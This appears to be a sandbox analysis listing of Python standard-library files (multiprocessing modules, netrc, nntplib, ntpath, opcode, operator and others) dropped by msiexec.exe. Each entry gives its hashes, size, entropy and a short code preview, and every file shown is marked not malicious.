                                                                                                                                SHA-256:383C43E1DAE74B168A4974FC22BBBE67FB3B670B9E68B0C5492B9E8FB16113E9
                                                                                                                                SHA-512:779EAC1C69FDB3ADFCDBCAD6338D91C8A8A55F2187E5CCF8079A381C78296C2DC4C211329EFD7F0674E91B15C3AB3970CD4C0A097559803FE423FA41183B694F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module providing the `Process` class which emulates `threading.Thread`..#..# multiprocessing/process.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = ['BaseProcess', 'current_process', 'active_children',.. 'parent_process']....#..# Imports..#....import os..import sys..import signal..import itertools..import threading..from _weakrefset import WeakSet....#..#..#....try:.. ORIGINAL_DIR = os.path.abspath(os.getcwd())..except OSError:.. ORIGINAL_DIR = None....#..# Public functions..#....def current_process():.. '''.. Return process object representing the current process.. '''.. return _current_process....def active_children():.. '''.. Return list of process objects corresponding to live child processes.. '''.. _cleanup().. return list(_children)......def parent_process():.. '''.. Return process object representing the parent process.. '''.. return _parent_process....#..#
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12402
                                                                                                                                Entropy (8bit):4.289994280422204
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:meihTGl8GCGGC6CiFh6ODp6s/e/ebELRgkil6viwZRVTUyJ110jGH91u1Xm/yJQt:men7c6qcRgHAZ8yJKmV
                                                                                                                                MD5:A2788C44A5A31128F9980C7698336052
                                                                                                                                SHA1:3A2824684D7653D337FF6D8D5A7EC66FFF731DFD
                                                                                                                                SHA-256:212AAD805E00BE239EEE241F283C4A7ADD77F612B873F71CA92BC3860B550A18
                                                                                                                                SHA-512:9CDDEF91F16A04EA8E4B60CB363042A8476F05E9FA0BA754BC7A77ACFFD2E601213FDD16FA1E68068303CEE0970643126CBE4EB7357AAB68A3DC9DF626E9D827
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module implementing queues..#..# multiprocessing/queues.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = ['Queue', 'SimpleQueue', 'JoinableQueue']....import sys..import os..import threading..import collections..import time..import types..import weakref..import errno....from queue import Empty, Full....import _multiprocessing....from . import connection..from . import context.._ForkingPickler = context.reduction.ForkingPickler....from .util import debug, info, Finalize, register_after_fork, is_exiting....#..# Queue type using a pipe, buffer and thread..#....class Queue(object):.... def __init__(self, maxsize=0, *, ctx):.. if maxsize <= 0:.. # Can raise ImportError (see issues #3770 and #23400).. from .synchronize import SEM_VALUE_MAX as maxsize.. self._maxsize = maxsize.. self._reader, self._writer = connection.Pipe(duplex=False).. self._rlock = ctx.Lock().. self
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9793
                                                                                                                                Entropy (8bit):4.692692560316822
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0NVdFSRwzj8HOsAS+78veR7Jv40syRZqLcA0j/Gr///pLmv9MBMG3Q:0Nb78H/w75RcYq2
                                                                                                                                MD5:423F27BFA3D8C2E57C22A395B5A35265
                                                                                                                                SHA1:352B22650D044CCC0059425DE396D6ABC0F66477
                                                                                                                                SHA-256:5C902343F58B184E0071592408CABEB8DDC0622D107A325361E6546F9AA7C5DB
                                                                                                                                SHA-512:89176BA1C7DFB24B308934CB78CA7ED6CA7F3C609D4390A923AEF01B7DBC038C3A68C9FF7F19A06B75D356EC8FEFE6029A992F521C5660DF40F480512AFD3438
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module which deals with pickling of objects...#..# multiprocessing/reduction.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....from abc import ABCMeta..import copyreg..import functools..import io..import os..import pickle..import socket..import sys....from . import context....__all__ = ['send_handle', 'recv_handle', 'ForkingPickler', 'register', 'dump']......HAVE_SEND_HANDLE = (sys.platform == 'win32' or.. (hasattr(socket, 'CMSG_LEN') and.. hasattr(socket, 'SCM_RIGHTS') and.. hasattr(socket.socket, 'sendmsg')))....#..# Pickler subclass..#....class ForkingPickler(pickle.Pickler):.. '''Pickler subclass used by multiprocessing.'''.. _extra_reducers = {}.. _copyreg_dispatch_table = copyreg.dispatch_table.... def __init__(self, *args):.. super().__init__(*args).. self.dispatch_table = self._copyreg_dispatch_table.copy().. self.dispatch_table.upda
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5286
                                                                                                                                Entropy (8bit):4.230497820733542
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:aHzUw7GTr49siEfiPsKyhCBbh7DjvsAXoyRH/XRd:aHgTc9sHiZ99DAAXhZ/XRd
                                                                                                                                MD5:E4AF137455ADA6F5E056914097586E03
                                                                                                                                SHA1:3DD1E08C9DD00F6F96F00CBE599D299C62B77866
                                                                                                                                SHA-256:829E9F71B3A4544ED136522EC0AD921CF509B08CDCEB5C27B887409065AD3E5D
                                                                                                                                SHA-512:51C3E99C4400C5989AAF688288C855CE1F5AEEDB4FFBF3F4432A416DB5E918CC6E45F15D88529447A5D81D3022E63128FFF17E2F519474E81BF178B7402E78F1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# We use a background thread for sharing fds on Unix, and for sharing sockets on..# Windows...#..# A client which wants to pickle a resource registers it with the resource..# sharer and gets an identifier in return. The unpickling process will connect..# to the resource sharer, sends the identifier and its pid, and then receives..# the resource...#....import os..import signal..import socket..import sys..import threading....from . import process..from .context import reduction..from . import util....__all__ = ['stop']......if sys.platform == 'win32':.. __all__ += ['DupSocket'].... class DupSocket(object):.. '''Picklable wrapper for a socket.'''.. def __init__(self, sock):.. new_sock = sock.dup().. def send(conn, pid):.. share = new_sock.share(pid).. conn.send_bytes(share).. self._id = _resource_sharer.register(send, new_sock.close).... def detach(self):.. '''Get the socket. This sho
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9214
                                                                                                                                Entropy (8bit):4.359944913736142
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:zhPNE7M7yY4dmGNPEGwiFAt8SiBL8KqpHnxIupQ0mWqggtv3/r8CHzR/looI:ZNEf5sGN8GTKtNtORrwCH93I
                                                                                                                                MD5:8DB2A358978E0E1703E033302D88942F
                                                                                                                                SHA1:9F1A2723408F29DBA6430178375BF7C19298D459
                                                                                                                                SHA-256:F9E01C70AA856BC45224E5A6E2959427729DEB8310213A3D831F2BFAA3A091C9
                                                                                                                                SHA-512:7B5E87089C9CB6209BC399B1B999BB3CC344A096332B792CCD9365366E1D0129732EB6C67D2AFC57150BFD15762B287EC3E2DE8E2232AFE582EFE08A0625FC6D
                                                                                                                                Malicious:false
                                                                                                                                Preview:###############################################################################..# Server process to keep track of unlinked resources (like shared memory..# segments, semaphores etc.) and clean them...#..# On Unix we run a server process which keeps track of unlinked..# resources. The server ignores SIGINT and SIGTERM and reads from a..# pipe. Every other process of the program has a copy of the writable..# end of the pipe, so we get EOF when all other processes have exited...# Then the server process unlinks any remaining resource names...#..# This is important because there may be system limits for such resources: for..# instance, the system only supports a limited number of named semaphores, and..# shared-memory segments live in the RAM. If a python process leaks such a..# resource, this resource will not be removed till the next reboot. Without..# this resource tracker process, "killall python" would probably leave unlinked..# resources.....import os..import signal..import sys..i
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18888
                                                                                                                                Entropy (8bit):4.298957214428322
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:i5TQXRRpMKP6cRwvmYtdRXzCuDHkH0FADzLaeAXYXPOSXv59O0S1khYlGTJNpfY3:K6vLTWdRXzzwzLaeAXYXWPfAfpfYtxz
                                                                                                                                MD5:9B3047FDF87C5F2CE0DEC4EF54691CF4
                                                                                                                                SHA1:0B00588A12D59FAD1B6E80687E81FE55DC041ED0
                                                                                                                                SHA-256:49B4E7BD0693F96014876EBD6A27F9F9DA4B9631C796254E8DA362AB2311FF0D
                                                                                                                                SHA-512:07A36379B7240E07C49310D28040EEDBE9C60684EE71750281D59CAA07D60C2E84969B5D66640824B505523D8CF1D140CA15DDD7A64E3BA673075BC783C3FF39
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Provides shared memory for direct access across processes.....The API of this package is currently provisional. Refer to the..documentation for details..."""......__all__ = [ 'SharedMemory', 'ShareableList' ]......from functools import partial..import mmap..import os..import errno..import struct..import secrets..import types....if os.name == "nt":.. import _winapi.. _USE_POSIX = False..else:.. import _posixshmem.. _USE_POSIX = True....from . import resource_tracker...._O_CREX = os.O_CREAT | os.O_EXCL....# FreeBSD (and perhaps other BSDs) limit names to 14 characters..._SHM_SAFE_NAME_LENGTH = 14....# Shared memory block name prefix..if _USE_POSIX:.. _SHM_NAME_PREFIX = '/psm_'..else:.. _SHM_NAME_PREFIX = 'wnsm_'......def _make_filename():.. "Create a random filename for the shared memory object.".. # number of random bytes to use for name.. nbytes = (_SHM_SAFE_NAME_LENGTH - len(_SHM_NAME_PREFIX)) // 2.. assert nbytes >= 2, '_SHM_NAME_PREFIX too long'..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6546
                                                                                                                                Entropy (8bit):4.748887455294723
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:sSDDhm4fJEQZkZfBkKcVGHbCc+hGGt6tgqMZwGKsbS3sabd:sfQKIGHmkP71
                                                                                                                                MD5:05D8111299DE2EB02F1CB00E5B4CD8D6
                                                                                                                                SHA1:E3AB2CDE6DF2F9299AF711C894146F9C0DB1DBBC
                                                                                                                                SHA-256:4BD32BAA2CCA0ACAD00027B800C851EEFF4B2463F2330765460A01751789272B
                                                                                                                                SHA-512:E9DC8F9583561F140B2B737B3B69106A268F0823BF88C77EB289638A6B78308E0843DF45C0017CCA8FDD73F80B7CEC656A344A37A7620510CC4897175D3DB84C
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module which supports allocation of ctypes objects from shared memory..#..# multiprocessing/sharedctypes.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....import ctypes..import weakref....from . import heap..from . import get_context....from .context import reduction, assert_spawning.._ForkingPickler = reduction.ForkingPickler....__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized']....#..#..#....typecode_to_type = {.. 'c': ctypes.c_char, 'u': ctypes.c_wchar,.. 'b': ctypes.c_byte, 'B': ctypes.c_ubyte,.. 'h': ctypes.c_short, 'H': ctypes.c_ushort,.. 'i': ctypes.c_int, 'I': ctypes.c_uint,.. 'l': ctypes.c_long, 'L': ctypes.c_ulong,.. 'q': ctypes.c_longlong, 'Q': ctypes.c_ulonglong,.. 'f': ctypes.c_float, 'd': ctypes.c_double.. }....#..#..#....def _new_value(type_):.. size = ctypes.sizeof(type_).. wrapper = heap.BufferWrapper(size).. return rebuild_ctype(type
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9722
                                                                                                                                Entropy (8bit):4.673917617861105
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:m9lzjwNmBRl/xr890cZ/WmI67vgAl6jusEb3klL:m9aYbE9vwjxL
                                                                                                                                MD5:B28A4D2532E1056F15C01940F00F06FD
                                                                                                                                SHA1:A05178F35CCCF121B3689003E2E935E899900E3A
                                                                                                                                SHA-256:649FC2E9FF3EEE29FC5B99D9F97B4807E280E8ED48ED1B73DB4E13CBE1CC250C
                                                                                                                                SHA-512:697D577DD465ED75F5445771282081DC4EC95EA5F05351B1B0F669CCE4A4F2E0C7A44ED1D722F061D819EAB08CFD9D4D5B033397BB3DF6CEE14CC9383517F92E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Code used to start processes when using the spawn or forkserver..# start methods...#..# multiprocessing/spawn.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....import os..import sys..import runpy..import types....from . import get_start_method, set_start_method..from . import process..from .context import reduction..from . import util....__all__ = ['_main', 'freeze_support', 'set_executable', 'get_executable',.. 'get_preparation_data', 'get_command_line', 'import_main_path']....#..# _python_exe is the assumed path to the python executable...# People embedding Python want to modify it...#....if sys.platform != 'win32':.. WINEXE = False.. WINSERVICE = False..else:.. WINEXE = getattr(sys, 'frozen', False).. WINSERVICE = sys.executable.lower().endswith("pythonservice.exe")....def set_executable(exe):.. global _python_exe.. if sys.platform == 'win32':.. _python_exe = os.fsdecode(exe).. else:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12171
                                                                                                                                Entropy (8bit):4.508295076634229
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:WG8nb1qhSMh/FA8AgmzxumyUTjKwA9e5e5SmLNm8QRhNl11SrIVx1YZNPqmk/t0w:WG8nYNcbqKPs2V
                                                                                                                                MD5:A0260FE8B1933A90C227BACC6BA6A5D8
                                                                                                                                SHA1:1C5F64672E51D564FDD5565FB1638F97CA1C6DAD
                                                                                                                                SHA-256:8D4FE9CA1D9324215BA6015DCA290918B7E202468340A2581F9A0963EB1C240B
                                                                                                                                SHA-512:961A002935F097B31CDA1BEB5E1818AA72CF4E5349BB7ABB38C626DD28EE5B15342E581DA813D91994CC4E5869273F8DCB38DF9E7152BE35FA292A266894ABC1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module implementing synchronization primitives..#..# multiprocessing/synchronize.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....__all__ = [.. 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event'.. ]....import threading..import sys..import tempfile..import _multiprocessing..import time....from . import context..from . import process..from . import util....# Try to import the mp.synchronize module cleanly, if it fails..# raise ImportError for platforms lacking a working sem_open implementation...# See issue 3770..try:.. from _multiprocessing import SemLock, sem_unlink..except (ImportError):.. raise ImportError("This platform lacks a functioning sem_open" +.. " implementation, therefore, the required" +.. " synchronization primitives needed will not" +.. " function, see issue 3770.")....#..# Constants..#....RECURSIVE_MUTEX, SEMAPHORE = list
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14563
                                                                                                                                Entropy (8bit):4.647901975909248
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:e7K3hAitstrXER4/yRo/k/ywA6ER5K+R/RMgSnN7x4VgrdpBdcRkCyVM4qyES0zd:e7KRAitsQVHE5onRxjd9umFaiToUQXdR
                                                                                                                                MD5:62F69DF794F38A0F500F0E22BDD629EE
                                                                                                                                SHA1:569F974D61D66D942398E0855BAB9C06AE42D243
                                                                                                                                SHA-256:D2221177FD96907509FAF836A5DE5F35714A1E4948F4CE4667A94C6C6324AA53
                                                                                                                                SHA-512:7BF3D26CFB19C369A5A4B647DA630340EDCC4484B571D5938A8313755186059A19D6AAE201155A712B109A5AC00CC4DF8A6BB6177CAB45A464403411F0653AC8
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Module providing various facilities to other parts of the package..#..# multiprocessing/util.py..#..# Copyright (c) 2006-2008, R Oudkerk..# Licensed to PSF under a Contributor Agreement...#....import os..import itertools..import sys..import weakref..import atexit..import threading # we want threading to install it's.. # cleanup function before multiprocessing does..from subprocess import _args_from_interpreter_flags....from . import process....__all__ = [.. 'sub_debug', 'debug', 'info', 'sub_warning', 'get_logger',.. 'log_to_stderr', 'get_temp_dir', 'register_after_fork',.. 'is_exiting', 'Finalize', 'ForkAwareThreadLock', 'ForkAwareLocal',.. 'close_all_fds_except', 'SUBDEBUG', 'SUBWARNING',.. ]....#..# Logging..#....NOTSET = 0..SUBDEBUG = 5..DEBUG = 10..INFO = 20..SUBWARNING = 25....LOGGER_NAME = 'multiprocessing'..DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s'...._logger = None.._log_to_stderr = False....def sub
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7121
                                                                                                                                Entropy (8bit):4.005577681934319
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:D97v//gkNoPh/PRRvs4RJ9zt3rvtmqqNZnSLIbf:R7/gmoPh/PRRRDIqgdSLI7
                                                                                                                                MD5:19646ECA5C16F435A31A46F901DA8EF8
                                                                                                                                SHA1:7523D50A50A9F09F2828B1B840F7EC7837A5617F
                                                                                                                                SHA-256:0D44FEA77B5BC082E5B69BE93D6AE66F4556753D8C2F50A61C6A1DC596BC7D3A
                                                                                                                                SHA-512:4263AAC578450DB0EEB7C9F0577F0F6406CFC49DC477A69A81AD2A671B2C34DEC4066D9F63C95877ADD584C82B68BDA062F0EF718D07197D66C77E0A0FA41C36
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""An object-oriented interface to .netrc files."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998....import os, shlex, stat....__all__ = ["netrc", "NetrcParseError"]......class NetrcParseError(Exception):.. """Exception raised on syntax errors in the .netrc file.""".. def __init__(self, msg, filename=None, lineno=None):.. self.filename = filename.. self.lineno = lineno.. self.msg = msg.. Exception.__init__(self, msg).... def __str__(self):.. return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)......class _netrclex:.. def __init__(self, fp):.. self.lineno = 1.. self.instream = fp.. self.whitespace = "\n\t\r ".. self.pushback = [].... def _read_char(self):.. ch = self.instream.read(1).. if ch == "\n":.. self.lineno += 1.. return ch.... def get_token(self):.. if self.pushback:.. return self.pushback.pop(0).. token = ""..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):42180
                                                                                                                                Entropy (8bit):4.585048172271767
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:qPz+zOekTQNd2n1/xwEtyvLrQiIVnt7P+QVE:wz4OnGo1pzsa1PRO
                                                                                                                                MD5:B3B2AD93BC11D19A155F048DA58B0E1B
                                                                                                                                SHA1:11EC782807DF777F97DEB2F57EF87420F78E8447
                                                                                                                                SHA-256:CF0B364BD546E36805BD267FEDD35A769C52BBED11FAADECBE690685F3D52B8E
                                                                                                                                SHA-512:1C12BE6B38E580C33E911D10A7598CEF23889AC3130E4AC154DC10CA35DCB06558B6DC06E77502BD79303E893CDB6C25BF33FCA7F8BD6C43EB3F08A4F8C02BDA
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""An NNTP client class based on:..- RFC 977: Network News Transfer Protocol..- RFC 2980: Common NNTP Extensions..- RFC 3977: Network News Transfer Protocol (version 2)....Example:....>>> from nntplib import NNTP..>>> s = NNTP('news')..>>> resp, count, first, last, name = s.group('comp.lang.python')..>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)..Group comp.lang.python has 51 articles, range 5770 to 5821..>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))..>>> resp = s.quit()..>>>....Here 'resp' is the server response line...Error responses are turned into exceptions.....To post an article from a file:..>>> f = open(filename, 'rb') # file containing article, including header..>>> resp = s.post(f)..>>>....For descriptions of all methods, read the comments in the code below...Note that all arguments and return values representing article numbers..are strings, not numbers, since they are rarely used for calculations..."""....# RFC 977 by Brian
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):30802
                                                                                                                                Entropy (8bit):4.495850798708398
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:oLxZcGnH1MszeSVz6CcuxUCVuM+AGje8BNRKUa:s/vtC6zCuxUCVNf8vRKf
                                                                                                                                MD5:1FB82B16E53DE4231A45C92121EB4F65
                                                                                                                                SHA1:18455830F0E4C4DEC1CE34469112466436F3CCB8
                                                                                                                                SHA-256:EA012F56AF4F542C323CF060B231563C45C0610541A664EBCDA16501CEE6C793
                                                                                                                                SHA-512:816333D85966BE5F27385D4FA615F0EF5B4E53C68F82BA901E8DCF8BA007BCD57BDF559E2B4B0387AAA5038B2F14624C521FC9B6EFA8D817F7B9BB7287D681A3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Module 'ntpath' -- common operations on WinNT/Win95 pathnames.."""Common pathname manipulations, WindowsNT/95 version.....Instead of importing this module directly, import os and refer to this..module as os.path..."""....# strings representing various path-related bits and pieces..# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '\\'..pathsep = ';'..altsep = '/'..defpath = '.;C:\\bin'..devnull = 'nul'....import os..import sys..import stat..import genericpath..from genericpath import *......__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename","dirname","commonprefix","getsize","getmtime",.. "getatime","getctime", "islink","exists","lexists","isdir","isfile",.. "ismount", "expanduser","expandvars","normpath","abspath",.. "curdir","pardir","sep","pathsep","defpath","altsep",.. "
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2968
                                                                                                                                Entropy (8bit):4.64153878996554
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:+W5wriD8gp26M8OjPZwZj33dyEUfIkiQ1J+4oEL8MyqBlJQGn7Iqaqy:+We2D3HM8OjPaDefIp74eMyqh+2y
                                                                                                                                MD5:1E561E1AD3FE73F57D902D66C695658A
                                                                                                                                SHA1:3DD20BA70AEC9AB04A3E69E17D0A2B10ECB43BC6
                                                                                                                                SHA-256:AD86C5B0A9D8F82E9129900F69765AD079CBEF670CCFD0B463FBF608E79224AD
                                                                                                                                SHA-512:B8E8AB92A11C66FE1A0D40C15F4D1071772EF1B0FBFE8F2A25793F6BD9704BC6BB6103E9FD619874774581E67C02D99D5143DCD6678E69F9C10EC7A3E20086B0
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Convert a NT pathname to a file URL and vice versa.....This module only exists to provide OS-specific code..for urllib.requests, thus do not use directly..."""..# Testing is done through test_urllib.....def url2pathname(url):.. """OS-specific conversion from a relative URL of the 'file' scheme.. to a file system path; not recommended for general use.""".. # e.g... # ///C|/foo/bar/spam.foo.. # and.. # ///C:/foo/bar/spam.foo.. # become.. # C:\foo\bar\spam.foo.. import string, urllib.parse.. # Windows itself uses ":" even in URLs... url = url.replace(':', '|').. if not '|' in url:.. # No drive specifier, just convert slashes.. if url[:4] == '////':.. # path is something like ////host/path/on/remote/host.. # convert this to \\host\path\on\remote\host.. # (notice halving of slashes at the start of the path).. url = url[2:].. components = url.split('/').. # make sure not to co
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10741
                                                                                                                                Entropy (8bit):4.539923490195961
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:gPOPzegOJGFvwyWWF0/zE0JeCQ29efwBlp7bv7ab4/g:gPOPzevyqzEf2AwfW4I
                                                                                                                                MD5:7769EC6B9C5D9BDCB77C0B8C0DD455B7
                                                                                                                                SHA1:133C707D9D0A624B0FF3053ABC2E242B19DD4597
                                                                                                                                SHA-256:2C6B8B3497379DCA72B20396651DC66E19105E0068617E2278FD4041CE9E1B5E
                                                                                                                                SHA-512:6A6626FB1314D17DA1CE1C1E60C45C07B1914C1B3503BB103965024F72D290FBCF6DE9A0664807EAA77458F98B84677D451027EE0E1B95817C9AC79CDA2D2F21
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for numbers, according to PEP 3141.....TODO: Fill out more detailed documentation on the operators."""....from abc import ABCMeta, abstractmethod....__all__ = ["Number", "Complex", "Real", "Rational", "Integral"]....class Number(metaclass=ABCMeta):.. """All numbers inherit from this class..... If you just want to check if an argument x is a number, without.. caring what kind, use isinstance(x, Number)... """.. __slots__ = ().... # Concrete numeric types must provide their own hash implementation.. __hash__ = None......## Notes on Decimal..## ----------------..## Decimal has all of the methods specified by the Real abc, but it should..## not be registered as a Real because decimals do not interoperate with..## binary floats (i.e. Decimal('3.14') + 2.71828 is undefined). But,..## abstract reals are expected to interoperate (i.e. R1
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10854
                                                                                                                                Entropy (8bit):5.332993454674192
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:kgFMs+MkeK7wwbdi6PYUZCbRRVbQw0VLJO9OMWRwEacUAsnQsm4/bIOBFNiAJOvJ:k9dqK7/dXQlbRolIglAJOvcXPH3DE
                                                                                                                                MD5:FB9B6853DE7A0D60860FC52268306421
                                                                                                                                SHA1:12C11F116F309629CE5452695055CD3D4D94D56F
                                                                                                                                SHA-256:8FCC88940C6D09BC323ECE96B5CB4120C5CA00635825EF5AC84282157F9E577E
                                                                                                                                SHA-512:7CB9E9959634ABE28125E3B2EC29D56CBD9472DBA786148FA2C5D0A6B0D4E51F07B94F8EDF3287F375E51E8E66A0A746174439B0BCE626C10A32E43265C40D96
                                                                                                                                Malicious:false
                                                                                                                                Preview:.."""..opcode module - potentially shared between dis and other modules which..operate on bytecodes (e.g. peephole optimizers)..."""....__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",.. "haslocal", "hascompare", "hasfree", "opname", "opmap",.. "HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]....# It's a chicken-and-egg I'm afraid:..# We're imported before _opcode's made...# With exception unheeded..# (stack_effect is not needed)..# Both our chickens and eggs are allayed...# --Larry Hastings, 2013/11/23....try:.. from _opcode import stack_effect.. __all__.append('stack_effect')..except ImportError:.. pass....cmp_op = ('<', '<=', '==', '!=', '>', '>=')....hasconst = []..hasname = []..hasjrel = []..hasjabs = []..haslocal = []..hascompare = []..hasfree = []..hasnargs = [] # unused....opmap = {}..opname = ['<%r>' % (op,) for op in range(256)]....def def_op(name, op):.. opname[op] = name.. opmap[name] = op....def name_op(name, op):.. de
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11432
                                                                                                                                Entropy (8bit):4.583472275898562
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:2Fe9H1gEi2lSRhgnxHKg4qa9lcDxtZifr6Rm6Qatv1S9WpEKQbi5rVKVOOcLRJpt:y2hwUEKQbi5zay
                                                                                                                                MD5:DC7484406CAD1BF2DC4670F25A22E5B4
                                                                                                                                SHA1:189CD94B6FDCA83AA16D24787AF1083488F83DB2
                                                                                                                                SHA-256:C57B6816CFDDFA6E4A126583FCA0A2563234018DAEC2CFB9B5142D855546955C
                                                                                                                                SHA-512:AC55BACED6C9EB24BC5ECBC9EFF766688B67550E46645DF176F6C8A6F3F319476A59AB6FC8357833863895A4EF7F3F99A8DFE0C928E382580DFFF0C28CA0D808
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Operator Interface....This module exports a set of functions corresponding to the intrinsic..operators of Python. For example, operator.add(x, y) is equivalent..to the expression x+y. The function names are those used for special..methods; variants without leading and trailing '__' are also provided..for convenience.....This is the pure Python implementation of the module..."""....__all__ = ['abs', 'add', 'and_', 'attrgetter', 'call', 'concat', 'contains', 'countOf',.. 'delitem', 'eq', 'floordiv', 'ge', 'getitem', 'gt', 'iadd', 'iand',.. 'iconcat', 'ifloordiv', 'ilshift', 'imatmul', 'imod', 'imul',.. 'index', 'indexOf', 'inv', 'invert', 'ior', 'ipow', 'irshift',.. 'is_', 'is_not', 'isub', 'itemgetter', 'itruediv', 'ixor', 'le',.. 'length_hint', 'lshift', 'lt', 'matmul', 'methodcaller', 'mod',.. 'mul', 'ne', 'neg', 'not_', 'or_', 'pos', 'pow', 'rshift',.. 'setitem', 'sub', 'truediv', 'truth', 'xor']....from bui
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):62050
                                                                                                                                Entropy (8bit):4.459564941363674
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yG/pFySCc5myk6vLS9021IwMniNxQ5xqSvl:yG/HyfN6o965xlvl
                                                                                                                                MD5:847CC0387E4999C3B43BCE251DF2DC18
                                                                                                                                SHA1:E7F6ED46A782655CBF381EC06EA05DEBF5506F4C
